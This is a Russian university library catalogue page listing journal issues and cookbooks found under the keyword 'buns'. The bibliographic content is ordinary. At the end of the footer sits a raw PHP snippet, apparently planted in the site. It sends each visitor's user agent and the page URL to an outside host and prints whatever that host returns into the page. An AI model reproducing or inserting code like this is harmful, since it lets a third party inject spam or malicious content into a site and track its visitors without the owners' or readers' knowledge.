Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

84 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=БУЛОЧКИ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 8
1. 
Питание и общество. - Журнал, 2012г. № 3
Оглавление 
  • Кравцов, Сергей Сергеевич. Учиться никогда не поздно. Всем / С. С. Кравцов. - с.2-3
  • Коновалова, А. Молекулярная гастрономия / А. Коновалова. - с.3
  • Каширина, Е. У истоков профессии. Иван Егорович Забелин - русский историк-археолог (1820 г. - 1908 г.) / Е. Каширина. - с.5
  • Бороздина, Л. Конкурсы профессионального мастерства как средство повышения качества подготовки специалистов отрасли / Л. Бороздина. - с.6
  • Забнев, Сергей. Как правильно заварить пуэр? / С. Забнев. - с.7
  • Арефьева, Анастасия. Самые "вкусные" города мира / А. Арефьева. - с.8
  • Гофман, Генрих Григорьевич. Модульный фаст-фуд / Г. Г. Гофман. - с.9
  • Номофилова, Н. Какой фаст-фуд нам нужен? / Н. Номофилова. - с.10-11
  • Дейниченко, Г. Как победить йододефицит / Г. Дейниченко, Г. Дюкарева. - с.12-13
  • Булочки с мюсли. - с.13
  • Пасхальная выпечка. - с.14-15
  • Пасхальный кулич. - с.15
  • Арефьева, Анастасия. Мнимые диеты прошлого и настоящего / А. Арефьева, Е. Арефьева. - с.18-19
  • Капуста для гурманов. - с.20
  • Холодец из моллюсков. - с.21
  • Курортный сервис... И антисервис. - с.22-23
  • Арефьева, Е. Скажите "чиииз"! / Е. Арефьева. - с.24-25
  • Мироевская, Н. Эта книга вас порадует / Н. Мироевская. - с.25-26
  • Любина, Е. Блины в разных кухнях мира / Е. Любина. - с.26-27
  • Ковалев, Н. И. Из глубины веков / Н. И. Ковалев, М. Н. Куткина, Н. Я. Карцева. - с.28-29
  • Тесто... в морозильнике. - с.29
  • Блюда из субпродуктов. - с.30
  • Омоньеры с фаршем из копченого лосося. - с.31
2. 
Огонек. - Журнал, 2005г. № 12
Оглавление 
  • Буртин, Александр. Эльбрус с видом на ваххабитов / А. Буртин. - с.4-5
  • Саркисян, Давид. Архитекторы против / Д. Саркисян. - с.6
  • Верб, Феликс. Выпросил / Ф. Верб. - с.8
  • Леонова, Полина. Кино без подвоха / П. Леонова. - с.12-13
  • Буртин, Александр. Нам сделают президента / А. Буртин, М. Куликова, В. Максимов. - с.14-17
  • Бальбуров, Дмитрий. Умный, высокий и загадочный / Д. Бальбуров. - с.19-21
  • Рахимов, Тимур. Чего ждать от бабы / Т. Рахимов. - с.22
  • Радулова, Наталья. Кто решил, что мужской стиль управления - норма? / Н. Радулова. - с.23
  • Как мы ходили в НАТО. - с.28-30
  • Торгашев, Алексей. Механизм гипноза раскрыт / А. Торгашев. - с.31
  • Самохин, Владимир. Головой в потолок / В. Самохин. - с.35
  • Николаева, Мирина. Спешить с уходом не стоит / М. Николаева. - с.35
  • Шумский, Александр. Фигурное катание / А. Шумский. - с.40-41
  • "Ершик" для кишечника. - с.45
  • Куликова, Майя. У москвички - афрокосички / М. Куликова. - с.46-47
  • Володарский, Леонид. Настоящее кино / Л. Володарский. - с.58
  • Кононенко, Максим. Семь жанров, или Окно президента / М. Кононенко. - с.59
  • Мясников, Иван. Три симптома / И. Мясников. - с.45
  • Державина, Любовь. Перестройка продлится до мая / Л. Державина. - с.44
  • Толбоев, Магомед. Новый русский шаттл / М. Толбоев. - с.7
  • Никитин, Сергей. Медведи летают / С. Никитин. - с.48-49
  • Вдовин, Влад. Уцелел / В. Вдовин. - с.9
  • Шестопал, Елена. Запах власти / Е. Шестопал. - с.18
  • Лагутенко, Илья. Глобализи и булочки / И. Лагутенко. - с.24-27
  • Голубкова, Екатерина. Метры навсегда / Е. Голубкова. - с.36-37
  • Верб, Феликс. С чаем не беда / Ф. Верб. - с.38
  • Минеева, Наталья. Клавдия Коршунова / Н. Минеева. - с.57
  • Архангельский, Андрей. Признак оперы / А. Архангельский. - с.54-56
  • Устинов, Александр. Сын Соловья / А. Устинов, В. Тихомиров. - с.62
  • Шумский, Александр. Обновленная MAZDA / А. Шумский. - с.42
  • Старобинец, Анна. Семья / А. Старобинец. - с.5
Держатели документа (Информация об экземплярах) 
3. 
Хлебопечение России. - Журнал, 2004г. № 3
Оглавление 
  • Чубенко, Н. Т. Ассортимент. Факторы и тенденции / Н. Т. Чубенко. - с.6-7
  • Поландова, Р. Д. Сравнительная оценка технологических свойств прессованных дрожжей / Р. Д. Поландова, Л. А. Шлеленко, Р. К. Еркинбаева, Мовсарова З. Х.. - с.8-9
    Другие авторы: Шлеленко Л. А., Еркинбаева Р. К., Мовсарова З. Х.
  • Пучкова, Л. И. Влияние поверхностно-активных веществ на реологические свойства мякиша батонов / Л. И. Пучкова, Т. В. толкунова, А. А. Алиев, Кондратьева С. В.. - с.10-11
    Другие авторы: толкунова Т. В., Алиев А. А., Кондратьева С. В.
  • Малофеева, Ю. Н. Исследование динамики изменения пентозанов в тесте из смеси ржаной и пшеничной муки / Ю. Н. Малофеева, И. В. Матвеева, Т. А. Юдина, Волкова М. В.. - с.12-14
    Другие авторы: Матвеева И. В., Юдина Т. А., Волкова М. В.
  • Корячкина, С. Я. применение ферментного препарата Целловиридин Г20х при производстве зернового хлеба / С. Я. Корячкина, Е. А. кузнецова, А. П. Синицын. - с.15-16
  • Письменный, В. В. Улучшитель для заварных пряников / В. В. Письменный, Б. Н. троицкий. - с.17
  • Смирнова, М. К. Настоящий русский хлеб / М. К. Смирнова. - с.18-20
  • Болгов, Е. А. Тостовый хлеб - с чем его едят? / Е. А. Болгов. - с.21-23
  • Быстров, А. В. Влияние ферментных препаратов протеологического действия на качество сахарного печенья / А. В. Быстров, И. В. Матвеева, Т. А. Юдина. - с.34-35
  • Ларионова, И. Солодовые экстракты: хлеб и булочки понравятся всем / И. Ларионова. - с.38
  • Кузнецов, И. Н. Совершенствование работы делителя-укладчика Ш32 ХДУ.Э3 / И. Н. Кузнецов, К. Г. новиков. - с.39
  • Фролов, Д. Начинаем модернизацию со склада / Д. Фролов. - с.40
  • Белик, В. Г. печь хлебопекарная тоннельная с конвективно-радиационным обогревом пекарной камеры / В. Г. Белик, А. М. Щербаков, А. А. Корчинский. - с.42-43
  • Овечкин, А. Б. Хлебопеки России в Германии / А. Б. Овечкин, О. А. Ильина, В. И. Дашевский. - с.44-45
  • К 75-летию создания РАСХН. - с.47
  • Коновалова, М. Ю. Пряники - вологодский стиль / М. Ю. Коновалова. - с.48-49
  • Кубок Л.Лесаффра в Санкт-Петербурге. - с.52-53
  • Чурилина, Н. В. О влиянии добавок минеральных солей и фосфолипазы на качество хлеба / Н. В. Чурилина, И. В. Матвеева, Т. А. Юдина. - с.24-26
  • Применение сои в хлебопекарной промышленности. - с.27
  • Бекалюк, А. Е. Сколько витаминов надо человеку? / А. Е. Бекалюк. - с.28
  • Мартынов, В. Б. Линия производства тестовых заготовок "Восход-3000" / В. Б. Мартынов. - с.29-31
Держатели документа (Информация об экземплярах) 
4. 
Питание и общество. - Журнал, 2011г. № 6
Оглавление 
  • Борисова, Ирина Владимировна. Школьные годы чудесные,.. / И. В. Борисова. - с.2-3
  • Антипаева, Мария. Почему из школьного меню исчезают каши и борщи? / М. Антипаева. - с.8
  • Соколик, Ю. 75 лет техникуму индустрии питания и услуг "Кулинар" / Ю. Соколик. - с.9
  • Мироевская, Валерия Федоровна. А завтра была война... / В. Ф. Мироевская. - с.10-11
  • Везденеева, Людмила Федоровна. После "Смены" - здоровая смена! / Л. Ф. Везденеева, Ю. Самойлов. - с.12-13
  • Арефьева, Елена. О воспитании культуры питания / Е. Арефьева. - с.14-15
  • Ермилова, К. Питание детей первого года жизни / К. Ермилова. - с.15-16
  • [Нормативные документы по дошкольному питанию]
  • Гордеева, Екатерина. Все о молочных продуктах в рационе детей / Е. Гордеева. - с.17
  • Кучер, Л. Готовимся к приему / Л. Кучер, Л. Шкуратова. - с.18-19
  • [Уроки кондитера]. - с.19
  • Ковалев, Н. И. Кисели / Н. И. Ковалев, М. Н. Куткина, Н. Я. Карцева. - с.20
  • Суворов, Роман. Ягодный кисель с вафлями и мороженым / Р. Суворов. - с.21
  • Булочки-"человечки". - с.21
  • Арефьева, Елена. Вкусные каши для Саши и Даши / Е. Арефьева. - с.22-23
  • Блюда санатория "Смена". - с.24-25
  • "Золотая рыбка". - с.26
  • "Божья коровка" из помидора. - с.26
  • Арефьева, Анастасия. Из весенних трав всей семье - на здоровье / А. Арефьева. - с.27
  • Забнев, Сергей. Кофейные коктейли для детей / С. Забнев. - с.28
  • Молочный кисель. - с.29
  • Арефьева, Анастасия. Разоблачаем мифы о еде / А. Арефьева, Е. Арефьева. - с.32
  • Мироевская, Н. Новый учебник / Н. Мироевская. - с.32
  • Смородиновый крем
5. 
Питание и общество. - Журнал, 2011г. № 1
Оглавление 
  • Забнев, Сергей. Кофе растворимый - и зерновой / С. Забнев. - с.10
  • Суворов, Роман. "Корзинка - витаминка" / Р. Суворов. - с.11
  • Кролик в сладком соусе. - с.11
  • Сальков, Петр. Приготовил Джамиль Гурбанов / П. Сальков. - с.12-13
  • Киреевский, Игорь. Салат Авиценны / И. Киреевский. - с.13
  • Тушеная телячья щековина. - с.14-15
  • Ефимов, А. Соусы нового поколения / А. Ефимов, Э. Морина. - с.18
  • Сладкие длинные булочки с шафраном. - с.19
  • Арефьева, Анастасия. Кефир - кладезь здоровья в стакане / А. Арефьева. - с.20-21
  • Арефьева, Елена. Хороша капустка / Е. Арефьева. - с.22-23
  • Ковалев, Н. И. Из глубины веков / Н. И. Ковалев, М. Н. Куткина, Н. Я. Карцева. - с.24
  • Арефьева, Анастасия. Любисток / А. Арефьева. - с.25
  • Самые необычные кушанья в мире. - с.25
  • Филонов, Михаил. "Конфетная трава" / М. Филонов. - с.26
  • Каширина, Е. "Варилка Папена" / Е. Каширина. - с.27
  • Лафер, Йоханн. Торт "Венский" / Й. Лафер
6. 
Кулинарные рецепты [Текст] / сост. Л. И. Воробьева, 1983. - 835 с.
Ключевые слова 
БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- ЗАКУСКА ХОЛОДНАЯ -- ЗАКУСКА ОВОЩНАЯ -- ЗАКУСКА ИЗ ЯИЦ -- СОУС -- ЗАКУСКА ГОРЯЧАЯ -- БУЛЬОН -- СУП -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- МЯСО ОТВАРНОЕ -- МЯСО ТУШЕНОЕ -- МЯСО ЖАРЕНОЕ -- МЯСО РУБЛЕНОЕ -- МЯСО ЗАПЕЧЕННОЕ -- РЫБА ОТВАРНАЯ -- РЫБА ЖАРЕНАЯ -- РЫБА ТУШЕНАЯ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МОЛОЧНЫЕ -- БЛЮДА ИЗ ЯИЦ -- ОМЛЕТ -- ОВОЩИ ОТВАРНЫЕ -- ОВОЩИ ЖАРЕНЫЕ -- ОВОЩИ ЗАПЕЧЕННЫЕ -- ОВОЩИ ТУШЕНЫЕ -- ОВОЩИ ФАРШИРОВАННЫЕ -- БЛЮДА ИЗ ГРИБОВ -- КАША -- ПЛОВ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО ПРЕСНОЕ -- ТЕСТО СЛОЕНОЕ -- БЛИНЫ -- ОЛАДЬИ -- БУЛОЧКИ -- КУЛИЧИ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- КЕКС -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- КРЕМ -- ПУДИНГ -- КОНСЕРВИРОВАНИЕ ДОМАШНЕЕ -- МАРИНАД -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ
Держатели документа (Информация об экземплярах) 
7. 
Постный стол [Текст] / ред., сост. Т. А. Ружинская, дар. А. В. Мышлявцев, 1999. - 345 с.
Держатели документа (Информация об экземплярах) 
8. 
Хлеб и хлебобулочные изделия [Текст] / пер. А. Чередниченко, 1998. - 143 с.
Ключевые слова 
Оглавление 
  • Хайш, А. Сведения о продуктах / А. Хайш. - с.14-19
  • Хайш, А. Кухонная техника / А. Хайш. - с.20-29
  • Каспарек-Тюрккан, Э. Хлеб из дрожжевого теста / Э. Каспарек-Тюрккан. - с.30-61
  • Каспарек-Тюрккан, Э. Хлеб из кислого теста / Э. Каспарек-Тюрккан. - с.62-79
  • Дёпп, Э. Специальные виды хлеба / Э. Дёпп. - с.80-97
  • Илиес, А. Булочки и К / А. Илиес. - с.98-127
  • Штубер, Б. Рецепты с хлебом / Б. Штубер. - с.128-139
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2995 - 22.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.90 с.22 запросов, 0.61c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;